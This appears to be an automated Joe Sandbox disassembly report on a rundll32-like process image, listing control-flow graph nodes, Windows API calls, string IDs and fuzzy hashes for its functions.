__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2806->2807 2808 e12b50 2807->2808 2808->2761 2808->2762 2810 e12da3 2809->2810 2811 e12e16 2810->2811 2812 e1230b 3 API calls 2810->2812 2814 e12e5c 2811->2814 2822 e14c0a 2811->2822 2813 e12df4 2812->2813 2813->2811 2815 e12dfb GetProcessHeap HeapFree 2813->2815 2814->2697 2815->2811 2818 e14c0a memcpy_s 2819 e12e3f 2818->2819 2826 e14ba0 2819->2826 2823 e14c1a 2822->2823 2824 e12e30 2822->2824 2823->2824 2825 e14c3d memcpy_s 2823->2825 2824->2818 2825->2824 2827 e14bb3 2826->2827 2829 e12e4e memset 2826->2829 2828 e14bdb memcpy_s 2827->2828 2827->2829 2828->2829 2829->2814 2830 e14700 2833 e1445f 2830->2833 2832 e1470d 2834 e13306 ctype 4 API calls 2833->2834 2835 e1446c 2834->2835 2835->2832 2853 e15490 2855 e154fa 2853->2855 2854 e155fb RoOriginateErrorW 2862 e155f9 2854->2862 2855->2854 2859 e1554c 2855->2859 2856 e161b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2857 e1562b 2856->2857 2858 e155d2 RoOriginateError 2858->2862 2859->2858 2860 e155e1 2859->2860 2863 e133f9 2860->2863 2862->2856 2864 e1341e AcquireSRWLockShared 2863->2864 2868 e13487 2863->2868 2866 e13441 DecodePointer 2864->2866 2867 e13477 2864->2867 2870 e13461 2866->2870 2867->2868 2869 e1347b ReleaseSRWLockShared 2867->2869 2871 e134c9 AcquireSRWLockExclusive 2868->2871 2877 e13470 2868->2877 2869->2868 2872 e13469 ReleaseSRWLockShared 2870->2872 2870->2877 2873 e134ee DecodePointer 2871->2873 2874 e134de EncodePointer 2871->2874 2872->2877 2875 e13505 2873->2875 2874->2875 2876 e1350e ReleaseSRWLockExclusive 2875->2876 2875->2877 2876->2877 2877->2862 2878 e14510 CoAddRefServerProcess 2879 e16510 SetUnhandledExceptionFilter 2888 e1699d 2889 e169a2 2888->2889 2892 e15e4f LdrResolveDelayLoadedAPI 2889->2892 2891 e169af 2892->2891

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0(?,00000000,00000000,00000000), ref: 00E15932
                                                                                                                • RtlSetSearchPathMode.NTDLL(00008001), ref: 00E15945
                                                                                                                • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 00E15961
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?), ref: 00E159BF
                                                                                                                • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00E159D1
                                                                                                                • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00E15A17
                                                                                                                • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00E15A38
                                                                                                                • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00E15A59
                                                                                                                • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 00E15A98
                                                                                                                • CreateActCtxWWorker.KERNEL32(?,?,?), ref: 00E15AB5
                                                                                                                • ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 00E15AF3
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000001), ref: 00E15B67
                                                                                                                • GetWindowLongW.USER32(?,00000000), ref: 00E15B77
                                                                                                                • GetWindow.USER32(?,00000003), ref: 00E15B89
                                                                                                                • memset.MSVCRT ref: 00E15BA7
                                                                                                                • GetClassNameW.USER32(00000000,?,00000050), ref: 00E15BB9
                                                                                                                • CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00E15BD7
                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 00E15BE5
                                                                                                                • GetWindow.USER32(00000000,00000004), ref: 00E15BF0
                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 00E15BFD
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,?), ref: 00E15C37
                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,0000001C,?,?), ref: 00E15C56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$LongWorker$Path$Search$ActivateAttributesClassCompareFileHandleModeModuleNameNtdllProc_RelativeStringmemset
                                                                                                                • String ID: $ $.manifest$IME$N$Qj$|
                                                                                                                • API String ID: 1028207903-2085582975
                                                                                                                • Opcode ID: 78ea605a8ec1ec116843f3ed746b85d3934746d576fc33e8ed6e68e69f314c81
                                                                                                                • Instruction ID: 704f54d2c5d8c38b1f0a2c90147554a62b1c923f267338ead0fcd0d0239f693a
                                                                                                                • Opcode Fuzzy Hash: 78ea605a8ec1ec116843f3ed746b85d3934746d576fc33e8ed6e68e69f314c81
                                                                                                                • Instruction Fuzzy Hash: 4E91A571A00619EFDB209F65DC8CFDAB7B8AF89324F104295F529F2190D7749A88CF61

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 51 e14136-e1416b HeapSetInformation NtSetInformationProcess 52 e1416e-e14177 51->52 52->52 53 e14179-e14195 call e16953 52->53 56 e14197-e141a6 AttachConsole 53->56 57 e141ab-e141bb LocalAlloc 53->57 56->57 58 e141c1-e141cf call e11ef1 57->58 59 e143a7-e143ae 57->59 64 e143a0-e143a1 LocalFree 58->64 65 e141d5-e141f1 call e15695 58->65 60 e143b0 FreeConsole 59->60 61 e143b6-e143b7 ExitProcess 59->61 60->61 64->59 65->64 68 e141f7-e14200 call e140b1 65->68 71 e14202-e14218 LoadLibraryExW 68->71 72 e1422c-e14231 68->72 73 e1422a 71->73 74 e1421a-e14228 GetProcAddress 71->74 75 e14233-e14242 call e140f3 72->75 76 e1425a-e1425f 72->76 73->72 74->72 85 e14393-e14395 75->85 86 e14248-e14255 call e13fe7 75->86 78 e14261-e14271 call e140f3 76->78 79 e14285-e142b0 SetErrorMode call e15911 call e15d6a 76->79 78->85 87 e14277-e14280 call e137c3 78->87 96 e14357-e1436b call e138f0 79->96 97 e142b6-e142e7 call e13e5b 79->97 88 e14397-e14398 FreeLibrary 85->88 89 e1439e 85->89 86->85 87->85 88->89 89->64 101 e14370-e14377 96->101 102 e142e9-e142ee 97->102 103 e1434b-e14355 LocalFree 97->103 101->85 104 e14379-e1437e 101->104 105 e142f0-e142f4 102->105 106 e142f8-e1431b call e13f6b call e15c6c call e140f3 102->106 103->101 107 e14380-e14386 DeactivateActCtx 104->107 108 e1438c-e1438d ReleaseActCtx 104->108 105->106 115 e14332-e14338 106->115 116 e1431d-e1432d call e14072 106->116 107->108 108->85 118 e14341-e14345 FreeLibrary 115->118 119 e1433a-e1433b DestroyWindow 115->119 116->115 118->103 119->118
                                                                                                                APIs
                                                                                                                • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00E1414D
                                                                                                                • NtSetInformationProcess.NTDLL ref: 00E14162
                                                                                                                • AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 00E14199
                                                                                                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00E141B1
                                                                                                                • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 00E1420E
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 00E14220
                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00E1428A
                                                                                                                • DestroyWindow.USER32(?), ref: 00E1433B
                                                                                                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E14345
                                                                                                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00E1434F
                                                                                                                • DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 00E14386
                                                                                                                • ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 00E1438D
                                                                                                                  • Part of subcall function 00E137C3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00E137D4
                                                                                                                  • Part of subcall function 00E137C3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00E119CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00E137F0
                                                                                                                  • Part of subcall function 00E137C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00E13808
                                                                                                                  • Part of subcall function 00E137C3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00E1381D
                                                                                                                  • Part of subcall function 00E137C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00E13866
                                                                                                                  • Part of subcall function 00E137C3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13873
                                                                                                                  • Part of subcall function 00E137C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E1387A
                                                                                                                  • Part of subcall function 00E137C3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00E18420,?), ref: 00E13897
                                                                                                                  • Part of subcall function 00E137C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00E138D9
                                                                                                                  • Part of subcall function 00E137C3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00E138E7
                                                                                                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E14398
                                                                                                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00E143A1
                                                                                                                • FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 00E143B0
                                                                                                                • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00E143B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateDestroyErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWaitWindow
                                                                                                                • String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
                                                                                                                • API String ID: 3009286836-3890604504
                                                                                                                • Opcode ID: d7e45284c00077fa63b478dd751e0f981203565cd9ffbd69f7f191c724e464aa
                                                                                                                • Instruction ID: 7469631d59dfde77f7593fc501b7144cdce285ab86df01d11c7c6f0c79a02901
                                                                                                                • Opcode Fuzzy Hash: d7e45284c00077fa63b478dd751e0f981203565cd9ffbd69f7f191c724e464aa
                                                                                                                • Instruction Fuzzy Hash: 3C615BB12043019FD710DF61D855AEFB7E5AF88714F049A29F9A6B22E1DB30C989CB52

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 168 e15d6a-e15d9f NtOpenProcessToken RtlNtStatusToDosError 169 e15da1-e15daa 168->169 170 e15dac 168->170 169->170 171 e15dc7-e15dce 170->171 172 e15dae-e15db4 call e15cf1 170->172 174 e15dd0-e15dd2 171->174 175 e15e3e-e15e4e call e161b0 171->175 177 e15db9-e15dc4 NtClose 172->177 174->175 178 e15dd4-e15dd6 174->178 177->171 180 e15dd8-e15ddb 178->180 181 e15dfa-e15dfd 178->181 180->181 182 e15ddd-e15df5 QueryActCtxW 180->182 183 e15e08-e15e1b NtOpenProcessToken 181->183 184 e15dff-e15e02 181->184 182->181 185 e15df7 182->185 183->175 187 e15e1d-e15e38 NtSetInformationToken NtClose 183->187 184->175 186 e15e04-e15e06 184->186 185->181 186->175 187->175
APIs
• NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00E15D8E
• RtlNtStatusToDosError.NTDLL ref: 00E15D95
• NtClose.NTDLL ref: 00E15DBE
• QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 00E15DED
• NtOpenProcessToken.NTDLL(000000FF,00000080,?), ref: 00E15E13
• NtSetInformationToken.NTDLL ref: 00E15E2F
• NtClose.NTDLL ref: 00E15E38
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
• String ID:
• API String ID: 3674487995-0

Control-flow Graph
APIs
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00E13C87
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00E13C93
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 00E13CF2
  • Part of subcall function 00E13B09: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00E13B39
  • Part of subcall function 00E13B09: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00E13B40
  • Part of subcall function 00E13B09: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00E13B6C
  • Part of subcall function 00E13B09: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00E13B87
• RtlImageNtHeader.NTDLL(00000000), ref: 00E13D13
• SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 00E13D4B
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
• String ID:
• API String ID: 4162338769-0

Control-flow Graph
APIs
• NtQueryInformationToken.NTDLL ref: 00E15D17
• NtQueryInformationToken.NTDLL ref: 00E15D3C
• RtlNtStatusToDosError.NTDLL ref: 00E15D4D
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: InformationQueryToken$ErrorStatus
• String ID:
• API String ID: 1049779487-0

Control-flow Graph
APIs
• NtQuerySystemInformation.NTDLL ref: 00E140D2
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: InformationQuerySystem
• String ID:
• API String ID: 3562636166-0

Control-flow Graph
APIs
• LdrResolveDelayLoadedAPI.NTDLL(00E10000,?,?), ref: 00E15E71
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: DelayLoadedResolve
• String ID:
• API String ID: 841769287-0

Control-flow Graph
APIs
• GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00E16C20,00000058), ref: 00E15F3A
• Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 00E15F6F
• _amsg_exit.MSVCRT ref: 00E15F84
• _initterm.MSVCRT ref: 00E15FD8
• __IsNonwritableInCurrentImage.LIBCMT ref: 00E16004
• exit.MSVCRT ref: 00E16087
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
• String ID:
• API String ID: 2849151604-0

Control-flow Graph

APIs
• LoadIconW.USER32(?,00000064), ref: 00E15C95
• LoadCursorW.USER32(00000000,00007F00), ref: 00E15CA4
• RegisterClassW.USER32(?), ref: 00E15CC7
• CreateWindowExW.USER32(00000080,RunDLL,00E119A0,00000000,80000000,80000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00E15CE6
Strings
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: Load$ClassCreateCursorIconRegisterWindow
• String ID: RunDLL
• API String ID: 1446224504-1316671358

Control-flow Graph
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00E13C66: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00E13C87
                                                                                                                  • Part of subcall function 00E13C66: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00E13C93
                                                                                                                  • Part of subcall function 00E13D62: _wtoi.MSVCRT(?), ref: 00E13D94
                                                                                                                  • Part of subcall function 00E13D62: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00E13DA0
                                                                                                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00E13EF5
                                                                                                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 00E13F00
                                                                                                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00E13F1E
                                                                                                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 00E13F5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
                                                                                                                • String ID:
                                                                                                                • API String ID: 1343397253-0
                                                                                                                • Opcode ID: 3f35737156cdb835c683478ae3527484c05c8f70aee9891c1161d07284307bd4
                                                                                                                • Instruction ID: 61424653a24624a33050761ab86884d38c9e84ea76fe113a4a09cb196953a2a7
                                                                                                                • Opcode Fuzzy Hash: 3f35737156cdb835c683478ae3527484c05c8f70aee9891c1161d07284307bd4
                                                                                                                • Instruction Fuzzy Hash: 28314CB5A00205EFDB14CFA9C8549EFBBB9EF89704F248069E915A7350DB309E42CB60

                                                                                                                 Control-flow Graph
                                                                                                                 Control-flow graph of function 00E15EF0-00E15F22 (graph image not reproduced): a single basic block calling __wgetmainargs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wgetmainargs
                                                                                                                • String ID:
                                                                                                                • API String ID: 1709950718-0
                                                                                                                • Opcode ID: 51e252cd98d832f4848bda6422248a35598eab311e273e852bfc4fb681e53f71
                                                                                                                • Instruction ID: 6c894bac7a693da8a4a8d196927244f0b217647b790585f4b9ff350b79fd9e39
                                                                                                                • Opcode Fuzzy Hash: 51e252cd98d832f4848bda6422248a35598eab311e273e852bfc4fb681e53f71
                                                                                                                • Instruction Fuzzy Hash: 9CD012706C130CEFF7609F27AF4A8C13AA0A31CF40705B054F840B11A2DE75989C8F11
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00E162F6,00E11000), ref: 00E161C7
                                                                                                                • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00E162F6,?,00E162F6,00E11000), ref: 00E161D0
                                                                                                                • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00E162F6,00E11000), ref: 00E161DB
                                                                                                                • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00E162F6,00E11000), ref: 00E161E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3231755760-0
                                                                                                                • Opcode ID: 4a276c9e9a2de8fb9bf1dfe67ddb7c362b1d4b5fbad0a80769cf0ff9521d745b
                                                                                                                • Instruction ID: dead9b5eceea8f21e980b25b37ddeb6fe9dca4cda1ecacf35a15b2427b416e8f
                                                                                                                • Opcode Fuzzy Hash: 4a276c9e9a2de8fb9bf1dfe67ddb7c362b1d4b5fbad0a80769cf0ff9521d745b
                                                                                                                • Instruction Fuzzy Hash: B5D0C932900104BFCB002FF2EC1DA893E28FB48212F05C410F31AA2022CB314846CB61
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 00E1265E
                                                                                                                • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00E12737
                                                                                                                • OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?), ref: 00E127A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4268342597-0
                                                                                                                • Opcode ID: 53357a75ac604eeba6539083711a7b3028a9b111e0f12cef418fccfb028daa6c
                                                                                                                • Instruction ID: e0582a9b458367a99b73904404a80bb79b3b67ff838862f6b4d3c55d676e5ca4
                                                                                                                • Opcode Fuzzy Hash: 53357a75ac604eeba6539083711a7b3028a9b111e0f12cef418fccfb028daa6c
                                                                                                                • Instruction Fuzzy Hash: CD619E706002059FCB21DF39DD546EEBBE6BF84710B19952EE91AF32A0DB34E895CB50
                                                                                                                APIs
                                                                                                                • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00E1161C,00000000,00000001,00E11940,?), ref: 00E12072
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID:
                                                                                                                • API String ID: 542301482-0
                                                                                                                • Opcode ID: c60f07d3db1ee06f25020485ce0d0bdba82bdd9037d40d39f06d6679a82800a7
                                                                                                                • Instruction ID: 467fc625cf38e70785839c096dedd0453158c3970d21a3d7c88ca95ed5b74e41
                                                                                                                • Opcode Fuzzy Hash: c60f07d3db1ee06f25020485ce0d0bdba82bdd9037d40d39f06d6679a82800a7
                                                                                                                • Instruction Fuzzy Hash: 68F05E35740228BFCA00DB55DC55FCD7769EB88710F144095FA06F7291CAB1AE45CB90
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000064C0), ref: 00E16515
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                 • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: ea27bce258cb8104d6b861719c5da89d496eb21a3c023f5dc1add92af63a0dd2
                                                                                                                • Instruction ID: 217998b8d93924a701924f9bc09c61904ba2a6b52672d43758fa5006cb03f864
                                                                                                                • Opcode Fuzzy Hash: ea27bce258cb8104d6b861719c5da89d496eb21a3c023f5dc1add92af63a0dd2
                                                                                                                • Instruction Fuzzy Hash: 3C9002742526004A47046F716C1D58525A07B4DB1A7825550A056E4155DA514149D511
                                                                                                                APIs
                                                                                                                • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 00E121D8
                                                                                                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00E1223F
